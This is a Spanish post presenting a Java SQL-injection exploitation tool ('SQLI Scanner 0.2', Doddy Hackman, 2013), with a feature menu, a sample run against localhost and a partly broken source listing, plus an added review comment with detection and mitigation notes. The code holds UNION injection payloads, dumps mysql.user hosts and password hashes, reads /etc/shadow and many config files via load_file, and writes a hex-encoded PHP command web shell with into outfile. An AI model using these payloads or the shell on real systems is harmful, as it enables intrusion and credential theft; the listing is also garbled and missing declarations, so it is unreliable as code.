Con las siguientes opciones :
- Comprobar vulnerabilidad
- Buscar número de columnas
- Buscar automáticamente el número para mostrar datos
- Mostrar tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar información sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
Un ejemplo de uso (contra un entorno de prueba local, http://localhost) :
Código:
-- == SQLI Scanner 0.2 == --
[+] Page :
http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data
-- == OPTIONS == --
--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit
[Option] :
10
[+] Searching informaion ...
[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off
[+] Finished
El código es el siguiente :
Código
// NOTE(review): this listing is incomplete as published. Method signatures and
// several declarations (for example the Scanner, URL/connection, writer and
// buffer objects the fragments use) are absent, and the code is collapsed onto
// a few physical lines, so every `//` comment swallows the rest of its line.
// It does not compile in this form; the statements below are left unchanged.
//
// What the visible statements do:
//  - Each request is built by replacing the placeholder "hackman" in a
//    UNION SELECT URL with a SQL expression, then fetching the page.
//  - Responses are parsed with regexes around fixed marker strings:
//    "ERTOR854" (sent as char(69,82,84,79,82,56,53,52)), "K0BRA" (sent as
//    0x4b30425241, with "K0BRA1"/"K0BRA2" variants) and "RATSXPDOWN<n>"
//    (sent hex-encoded) during column probing.
//  - The vulnerability check looks for the MySQL error text "The used SELECT
//    statements have a different number of columns" in the response body, and
//    column probing only tries 1 to 5 columns (`x <= 5`).
//  - One fragment sets a fixed, dated Firefox 2.0.0.12 User-Agent and reads
//    the response line by line; presumably this is toma() -- confirm.
//  - One fragment writes to "logs/" + host + ".txt"; presumably savefile().
//  - The outfile fragment writes a hex-encoded PHP page named cmd.php and then
//    requests it, looking for the title "Mini Shell By Doddy".
//
// Detection notes for defenders (all taken from literals in this listing):
//  - Query strings containing the markers above, "+union+select+",
//    "information_schema", "mysql.user", "load_file(" or "+into+outfile+".
//  - The exact User-Agent string set in the fetch fragment.
//  - A new cmd.php under the web root, or the "Mini Shell By Doddy" title.
//
// Mitigation notes:
//  - The whole tool depends on an injectable parameter; parameterized queries
//    remove that precondition.
//  - The check relies on database error text reaching the page; do not echo
//    database errors to clients.
//  - load_file / into outfile need the MySQL FILE privilege and are limited by
//    secure_file_priv; the application account should not hold FILE, and the
//    database process should not be able to write to the web root.
//
// Review notes on the code itself:
//  - The load_file probe logs "[-] load_file : on" when the marker IS found;
//    the "[-]" prefix looks inconsistent with the other "[+] ... : on" lines.
//    The sample output shows "[-] load_file : off", so the else branch may
//    have lost its statement in extraction -- confirm against the original.
//  - `finals` (loop bound) and `l` (appended in the hex encoder) are never
//    assigned in the visible text; presumably stripped lines -- confirm.
//  - `text.getBytes()` uses the platform default charset.
//  - The writer and reader are closed without try/finally, so an exception
//    between open and close would leak them.
// -- == -- == -- == ---- == // SQLI Scanner 0.2 || // -- == -- == -- == ---- == // (C) Doddy Hackman 2013 || // -- == -- == -- == ---- == import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { String target; installer(); target = host.nextLine(); scan(target); //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers"); //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman"); //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers"); //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password"); //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt"); //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/"); } while (true) { int op; op = host.nextInt(); if (op == 1) { schematables(urla); continuar(); } else if (op == 2) { String coler; coler = a.nextLine(); schemacolumns(urla, coler); continuar(); } else if (op == 3) { getdbs(urla); continuar(); } else if (op == 4) { String tabler; tabler = a.nextLine(); getablesbydb(urla, tabler); continuar(); } else if (op == 5) { String dber; String tablerx; dber = a.nextLine(); tablerx = a.nextLine(); getcolbydb(urla, dber, tablerx); continuar(); } else if (op == 6) { mysqluser(urla); continuar(); } else if (op == 7) { fuzzfiles(urla); continuar(); } else if (op == 8) { String ar; ar = f.nextLine(); openfile(urla, ar); continuar(); } else if (op == 9) { String a; String b; String c; a = m.nextLine(); b = n.nextLine(); c = l.nextLine(); 
dumper(urla, a, b, c); continuar(); } else if (op == 10) { details(urla); continuar(); } else if (op == 11) { String b; String c; b = m.nextLine(); c = n.nextLine(); intofile(urla, b, c); continuar(); } else if (op == 12) { String ruta; continuar(); } else if (op == 13) { continuar(); } else { continuar(); } } } chau.nextLine(); } if (!crear.isDirectory()) { crear.mkdirs(); } } String linea; String lugar; String lugardos; String webtest; String web1; String formandoweb; String code; linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"; lugar = fpd + "/cmd.php"; lugardos = dir + "/cmd.php"; webtest = "http://" + h.getHost() + lugardos; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", linea); formandoweb = web1 + "+into+outfile+'" + lugar + "'--"; code = toma(formandoweb); code = toma(webtest); uno = Pattern.compile("Mini Shell By Doddy"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n"); } else { } } String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; archivo = encodehex(file); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] File Found : " + file); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } else { } } String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", 
"/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", 
"C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", 
"/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", 
"/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"}; String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; for (int count = 0; count < archivos.length; count++) { archivo = encodehex(archivos[count]); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = 
urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))"); code = toma(web1 + "+from+" + tabla + "--"); uno = Pattern.compile("K0BRA(.*?)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1)); savefile(urla, "[+] " + col2 + " : " + dos.group(2)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))"); code = toma(web1 + "+from+mysql.user--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Host : " + dos.group(1)); savefile(urla, "[+] Username : " + dos.group(2)); savefile(urla, "[+] Password : " + dos.group(3)); } } } else { } } String web1; String web2; String code; String dbf; String table; int x; Pattern uno = null; Matcher dos = null; dbf = encodehex(db); table = encodehex(tab); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" 
+ dbf + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; String data; int x; Pattern uno = null; Matcher dos = null; data = encodehex(db); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[DB] : " + db + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.schemata--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--"); uno = 
Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] DB Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; String tablexa; int x; Pattern uno = null; Matcher dos = null; tablexa = encodehex(nombre); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.tables--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, ""); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { } } String codex; String target; Pattern uno = null; Matcher dos = null; target = urla; codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { int x; String urlfinal; 
String otrofinal; String code; String formariny; String otroformar; String link; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; savefile(link, "\r\n" + "[Target] : " + link); savefile(link, "[Limit] : The site has " + x + " columns"); savefile(link, "[Data] : The number " + dos.group(1) + " print data"); manejo(link); } } } else { } } String concat; String code; Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1)); savefile(urla, "[+] DB Name : " + dos.group(2)); savefile(urla, "[+] Username : " + dos.group(3)); } else { } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] information_schema : on"); } else { } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] mysqluser : on"); } else { } urla = urla.replace("char(69,82,84,79,82,56,53,52)", 
"concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[-] load_file : on"); } else { } } String formar; formar = "logs/" + h.getHost() + ".txt"; writer.write(texto + "\r\n"); writer.close(); } String re; hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); String l; int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?